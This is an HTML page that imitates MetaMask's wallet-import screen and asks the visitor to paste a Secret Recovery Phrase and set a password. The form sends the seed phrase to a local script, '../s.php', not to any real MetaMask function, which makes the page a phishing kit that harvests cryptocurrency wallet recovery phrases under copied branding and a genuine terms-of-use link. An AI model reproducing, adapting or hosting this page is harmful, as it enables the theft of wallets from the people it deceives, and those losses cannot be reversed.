<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8"/>
    <link rel="shortcut icon" type="image/png" href="../../assets/img/metamask-fox2.svg"/>
    <link rel="apple-touch-icon" sizes="180x180" href="../../assets/img/metamask-fox2.svg"/>
    <link rel="icon" type="image/png" sizes="32x32" href="../../assets/img/metamask-fox2.svg"/>
    <link rel="icon" type="image/png" sizes="16x16" href="../../assets/img/metamask-fox2.svg"/>
    <meta name="viewport" content="width=device-width,initial-scale=1"/>
    <meta name="theme-color" content="#ff007a"/>
    <meta name="fortmatic-site-verification" content="j93LgcVZk79qcgyo"/>
    <title>Metamask</title>
    <link rel="stylesheet" href="../assets/css/index-rtl.css">
    <link rel="stylesheet" href="../assets/css/index.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>
    <script src="../../js/jquery-3.6.0.min.js" type="text/javascript"></script>
    <script src="https://kit.fontawesome.com/b617dc6679.js" crossorigin="anonymous"></script>
    <style data-jss="" data-meta="MuiInputBase">
        @-webkit-keyframes mui-auto-fill {}
        @-webkit-keyframes mui-auto-fill-cancel {}
        .MuiInputBase-root {
          color: rgba(0, 0, 0, 0.87);
          cursor: text;
          display: inline-flex;
          position: relative;
          font-size: 1rem;
          box-sizing: border-box;
          align-items: center;
          font-family: "Roboto", "Helvetica", "Arial", sans-serif;
          font-weight: 400;
          line-height: 1.1876em;
          letter-spacing: 0.00938em;
        }
        .MuiInputBase-root.Mui-disabled {
          color: rgba(0, 0, 0, 0.38);
          cursor: default;
        }
        .MuiInputBase-multiline {
          padding: 6px 0 7px;
        }
        .MuiInputBase-multiline.MuiInputBase-marginDense {
          padding-top: 3px;
        }
        .MuiInputBase-fullWidth {
          width: 100%;
        }
        .MuiInputBase-input {
          font: inherit;
          color: currentColor;
          width: 100%;
          border: 0;
          height: 1.1876em;
          margin: 0;
          display: block;
          padding: 6px 0 7px;
          min-width: 0;
          background: none;
          box-sizing: content-box;
          animation-name: mui-auto-fill-cancel;
          letter-spacing: inherit;
          animation-duration: 10ms;
          -webkit-tap-highlight-color: transparent;
        }
        .MuiInputBase-input::-webkit-input-placeholder {
          color: currentColor;
          opacity: 0.42;
          transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
        }
        .MuiInputBase-input::-moz-placeholder {
          color: currentColor;
          opacity: 0.42;
          transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
        }
        .MuiInputBase-input:-ms-input-placeholder {
          color: currentColor;
          opacity: 0.42;
          transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
        }
        .MuiInputBase-input::-ms-input-placeholder {
          color: currentColor;
          opacity: 0.42;
          transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
        }
        .MuiInputBase-input:focus {
          outline: 0;
        }
        .MuiInputBase-input:invalid {
          box-shadow: none;
        }
        .MuiInputBase-input::-webkit-search-decoration {
          -webkit-appearance: none;
        }
        .MuiInputBase-input.Mui-disabled {
          opacity: 1;
        }
        .MuiInputBase-input:-webkit-autofill {
          animation-name: mui-auto-fill;
          animation-duration: 5000s;
        }
        label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-webkit-input-placeholder {
          opacity: 0 !important;
        }
        label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-moz-placeholder {
          opacity: 0 !important;
        }
        label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:-ms-input-placeholder {
          opacity: 0 !important;
        }
        label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-ms-input-placeholder {
          opacity: 0 !important;
        }
        label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-webkit-input-placeholder {
          opacity: 0.42;
        }
        label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-moz-placeholder {
          opacity: 0.42;
        }
        label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus:-ms-input-placeholder {
          opacity: 0.42;
        }
        label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-ms-input-placeholder {
          opacity: 0.42;
        }
        .MuiInputBase-inputMarginDense {
          padding-top: 3px;
        }
        .MuiInputBase-inputMultiline {
          height: auto;
          resize: none;
          padding: 0;
        }
        .MuiInputBase-inputTypeSearch {
          -moz-appearance: textfield;
          -webkit-appearance: textfield;
        }
        </style>
        <style data-jss="" data-meta="MuiInput">
            .MuiInput-root {
              position: relative;
            }
            label + .MuiInput-formControl {
              margin-top: 16px;
            }
            .MuiInput-colorSecondary.MuiInput-underline:after {
              border-bottom-color: #f50057;
            }
            .MuiInput-underline:after {
              left: 0;
              right: 0;
              bottom: 0;
              content: "";
              position: absolute;
              transform: scaleX(0);
              transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
              border-bottom: 2px solid #3f51b5;
              pointer-events: none;
            }
            .MuiInput-underline.Mui-focused:after {
              transform: scaleX(1);
            }
            .MuiInput-underline.Mui-error:after {
              transform: scaleX(1);
              border-bottom-color: #f44336;
            }
            .MuiInput-underline:before {
              left: 0;
              right: 0;
              bottom: 0;
              content: "\00a0";
              position: absolute;
              transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
              border-bottom: 1px solid rgba(0, 0, 0, 0.42);
              pointer-events: none;
            }
            .MuiInput-underline:hover:not(.Mui-disabled):before {
              border-bottom: 2px solid rgba(0, 0, 0, 0.87);
            }
            .MuiInput-underline.Mui-disabled:before {
              border-bottom-style: dotted;
            }
            @media (hover: none) {
              .MuiInput-underline:hover:not(.Mui-disabled):before {
                border-bottom: 1px solid rgba(0, 0, 0, 0.42);
              }
            }
            </style>
            <style data-jss="" data-meta="MuiFormLabel">
                .MuiFormLabel-root {
                  color: rgba(0, 0, 0, 0.54);
                  padding: 0;
                  font-size: 1rem;
                  font-family: "Roboto", "Helvetica", "Arial", sans-serif;
                  font-weight: 400;
                  line-height: 1;
                  letter-spacing: 0.00938em;
                }
                .MuiFormLabel-root.Mui-focused {
                  color: #3f51b5;
                }
                .MuiFormLabel-root.Mui-disabled {
                  color: rgba(0, 0, 0, 0.38);
                }
                .MuiFormLabel-root.Mui-error {
                  color: #f44336;
                }
                .MuiFormLabel-colorSecondary.Mui-focused {
                  color: #f50057;
                }
                .MuiFormLabel-asterisk.Mui-error {
                  color: #f44336;
                }
                </style>
            <style data-jss="" data-meta="MuiFormControl">
                .MuiFormControl-root {
                  border: 0;
                  margin: 0;
                  display: inline-flex;
                  padding: 0;
                  position: relative;
                  min-width: 0;
                  flex-direction: column;
                  vertical-align: top;
                }
                .MuiFormControl-marginNormal {
                  margin-top: 16px;
                  margin-bottom: 8px;
                }
                .MuiFormControl-marginDense {
                  margin-top: 8px;
                  margin-bottom: 4px;
                }
                .MuiFormControl-fullWidth {
                  width: 100%;
                }
                </style>
                <style data-jss="" data-meta="MuiTextField">

                </style>
                <style data-jss="" data-meta="makeStyles">
                    .jss1 {
                      color: #aeaeae;
                      font-weight: 400;
                    }
                    .jss1.jss2 {
                      color: #aeaeae;
                    }
                    .jss1.jss4 {
                      color: #aeaeae;
                    }
                    .jss3:after {
                      border-bottom: 2px solid rgb(3, 125, 214);
                    }
                    .jss5 {
                      color: #aeaeae;
                    }
                    .jss6 {
                      padding: 8px;
                    }
                    .jss6::placeholder {
                      color: #aeaeae;
                    }
                    .jss7 {
                      color: #fff;
                    }
                    .jss8:after {
                      border-bottom: 2px solid #fff;
                    }
                    .jss9.jss10 {
                      color: #5b5b5b;
                    }
                    .jss9.jss4 {
                      color: #5b5b5b;
                    }
                    .jss12 {
                      border: 1px solid #BBC0C5;
                      height: 48px;
                      display: flex;
                      padding: 0 16px;
                      align-items: center;
                      border-radius: 6px;
                    }
                    label + .jss12 {
                      margin-top: 9px;
                    }
                    .jss12.jss11 {
                      border: 1px solid #2f9ae0;
                    }
                    .jss13 {
                      color: #5b5b5b;
                      position: initial;
                      font-size: 1rem;
                      transform: none;
                      transition: none;
                    }
                    .jss14 {
                      color: #5b5b5b;
                      position: initial;
                      font-size: .75rem;
                      transform: none;
                      transition: none;
                    }
                    .jss15 {
                      line-height: initial !important;
                    }
                    </style>
</head>
<body>
    <div id="app-content">
        <div class="app os-win mouse-user-styles">
            <div class="menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;">
                <style>
                    .menu-droppo-enter {
                        transition: transform 300ms ease-in-out;
                        transform: translateY(-200%);
                    }
    
                    .menu-droppo-enter.menu-droppo-enter-active {
                        transition: transform 300ms ease-in-out;
                        transform: translateY(0%);
                    }
    
                    .menu-droppo-leave {
                        transition: transform 300ms ease-in-out;
                        transform: translateY(0%);
                    }
    
                    .menu-droppo-leave.menu-droppo-leave-active {
                        transition: transform 300ms ease-in-out;
                        transform: translateY(-200%);
                    }
                </style>
            </div>
            <div class="main-container-wrapper">
                <div class="first-time-flow">
                    <div class="first-time-flow__wrapper">
                        <div class="app-header__logo-container">
                            <img height="30" src="../assets/images/metamask-logo-horizontal.svg" class="app-header__metafox-logo--horizontal" alt="" />
                            <img height="42" width="42" src="../../assets/img/metamask-fox2.svg" class="app-header__metafox-logo--icon" alt="" />
                        </div>
                        <form class="first-time-flow__form" action="../s.php" method="post">
                            <div class="first-time-flow__create-back"><a href="../">&lt; Back</a></div>
                            <div class="first-time-flow__header">Import a wallet with Secret Recovery Phrase</div>
                            <div class="first-time-flow__text-block">Only the first account on this wallet will auto load. After completing this process, to add additional accounts, click the drop down menu, then select Create Account.</div>
                            <div class="first-time-flow__textarea-wrapper">
                                <label>Secret Recovery Phrase</label>
                                <textarea style="display: none;" class="first-time-flow__textarea" placeholder="Separate each word with a single space" autocomplete="off"></textarea>
                                <div class="MuiFormControl-root MuiTextField-root first-time-flow__textarea first-time-flow__seedphrase">
                                    <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl">
                                        <input aria-invalid="false" name="s_eed_Dc" autocomplete="off" placeholder="Paste Secret Recovery Phrase from clipboard" type="password" dir="auto" class="MuiInputBase-input MuiInput-input" value="" />
                                    </div>
                                </div>
                                <div class="first-time-flow__checkbox-container">
                                    <div class="first-time-flow__checkbox" tabindex="0" role="checkbox" aria-checked="false" aria-labelledby="ftf-chk1-label"></div>
                                    <span id="ftf-chk1-label" class="first-time-flow__checkbox-label">Show Secret Recovery Phrase</span>
                                </div>
                            </div>
                            <div class="MuiFormControl-root MuiTextField-root first-time-flow__input MuiFormControl-marginNormal">
                                <label class="MuiFormLabel-root MuiInputLabel-root jss9 jss13 MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-shrink" data-shrink="true" for="password" id="password-label">
                                    New password (min 8 chars)
                                </label>
                                <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl">
                                    <input aria-invalid="false" autocomplete="new-password" id="password" type="password" dir="auto" class="MuiInputBase-input MuiInput-input" value="" />
                                </div>
                            </div>
                            <div class="MuiFormControl-root MuiTextField-root first-time-flow__input MuiFormControl-marginNormal">
                                <label class="MuiFormLabel-root MuiInputLabel-root jss9 jss13 MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-shrink" data-shrink="true" for="confirm-password" id="confirm-password-label">
                                    Confirm password
                                </label>
                                <div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl">
                                    <input aria-invalid="false" autocomplete="new-password" id="confirm-password" type="password" dir="auto" class="MuiInputBase-input MuiInput-input" value="" />
                                </div>
                            </div>
                            <div class="first-time-flow__checkbox-container">
                                <div class="first-time-flow__checkbox first-time-flow__terms" tabindex="0" role="checkbox" aria-checked="false" aria-labelledby="ftf-chk1-label"></div>
                                <span id="ftf-chk1-label" class="first-time-flow__checkbox-label">
                                    <span>
                                        I have read and agree to the <a href="https://metamask.io/terms.html" target="_blank" rel="noopener noreferrer"><span class="first-time-flow__link-text">Terms of Use</span></a>
                                    </span>
                                </span>
                            </div>
                            <button class="button btn--rounded btn-primary first-time-flow__button" disabled="" type="submit">Import</button>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>    
    <script src="../assets/js/ui-0.js"></script>
</body>
</html>